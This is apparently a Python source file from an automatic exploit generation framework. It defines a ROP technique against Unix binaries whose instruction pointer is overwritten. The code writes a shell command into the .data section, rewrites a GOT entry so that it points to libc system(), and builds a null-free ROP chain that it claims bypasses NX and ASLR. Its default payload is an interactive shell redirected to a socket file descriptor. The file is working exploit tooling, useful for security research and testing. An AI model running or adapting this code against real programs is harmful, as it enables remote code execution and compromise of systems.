import logging
import struct

from angrop.errors import RopException

from ...vulnerability import Vulnerability
from .. import Exploit, CannotExploit
from ..technique import Technique

l = logging.getLogger(name=__name__)


class RopToSystemComplicated(Technique):

    name = "rop_to_system_complicated"
    applicable_to = ['unix']

    def check(self):
        if self.rop is None:
            self.check_fail_reason("No ROP available.")
            return False

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        # libc has to be loaded
        libc_obj = self._get_libc_obj()
        if libc_obj is None:
            self.check_fail_reason("libc.so is not found in the process space.")
            return False

        # it has to have "system"
        system_addr = self._get_libc_func_addr("system")
        if system_addr is None:
            self.check_fail_reason("Cannot find system() in libc.so.")
            return False

        # has to have plt
        plt = self.crash.project.loader.main_object.plt
        if not plt:
            self.check_fail_reason("PLT does not exist.")
            return False

        return True

    @staticmethod
    def chop_string(s, n):

        chopped = [ ]
        for i in range(0, len(s), n):
            chopped.append(s[i : i + n])
        return chopped

    def apply(self,  to_exec=None, **kwargs): #pylint:disable=arguments-differ

        if to_exec is None:
            # FIXME: Hardcoded exec string for now
            to_exec = "/bin/sh -i >&{fd} 0>&{fd} 2>&{fd}".format(fd=8)

        libc_obj = self._get_libc_obj()
        assert libc_obj is not None
        l.warning("Using libc from %s. This exploit will fail if this libc is not the one used remotely.",
                  libc_obj.binary)

        chunk_list = [ ]

        # Write the executable string to a all-zero region in .data section
        # FIXME:
        str_addr = 0x8053e9e

        for i, chopped in enumerate(self.chop_string(to_exec, 4)):
            n = struct.unpack("<I", chopped.encode("ascii"))[0]
            try:
                trunk = self.rop.add_to_mem(str_addr + i * 4, n)
            except RopException as ex:
                raise CannotExploit("Can't find a way to write chunk [{}:{}] of the string '{}' to memory!".format(i, i + 4, to_exec)) from ex

            chunk_list.append(trunk)

        # increment a function pointer so that it points to "system"
        # FIXME:

        plt = self.crash.project.loader.main_object.plt
        func_name = None
        for func_name in ["open"] + list(plt.keys()):
            if func_name.startswith("__"):
                continue
            if func_name not in self.crash.project.loader.main_object.jmprel:
                continue
            l.debug("Picking PLT function %s.", func_name)
            func_addr = plt[func_name]
            func_addr_ptr = self.crash.project.loader.main_object.jmprel[func_name].rebased_addr
            break
        else:
            raise CannotExploit("All functions in PLT do not exist in libc.")

        diff = self._get_libc_func_addr("system") - self._get_libc_func_addr(func_name)
        l.debug("The difference between libc function system and libc function %s is %#x.", func_name, diff)

        chunk_list.append(self.rop.add_to_mem(func_addr_ptr, diff))

        # call func_ptr(target_addr)
        chunk = self.rop.func_call(func_addr, [str_addr])
        chunk_list.append(chunk)

        # Make sure there are no null bytes!
        for chunk in chunk_list:
            var = [ ]
            for v, _ in chunk._values:
                if not isinstance(v, int):
                    var.append(v)
            constraints = [ ]
            for v in var:
                for b in v.chop(self.crash.state.arch.bits):
                    constraints.append(b != 0)

            for constraint in constraints:
                chunk.add_constraint(constraint)

        chain = sum(chunk_list[1:], chunk_list[0])

        # insert the chain into the binary
        try:
            chain, chain_addr = self._ip_overwrite_with_chain(chain, self.crash.state)
        except CannotExploit as ex:
            raise CannotExploit("[%s] unable to insert chain" % self.name) from ex

        # add the constraint to the state that the chain must exist at the address
        chain_mem = self.crash.state.memory.load(chain_addr, chain.payload_len)
        self.crash.state.add_constraints(chain_mem == self.crash.state.solver.BVV(chain.payload_str()))

        if not self.crash.state.satisfiable():
            raise CannotExploit("[%s] generated exploit is not satisfiable" % self.name)

        return Exploit(self.crash, bypasses_nx=True, bypasses_aslr=True)
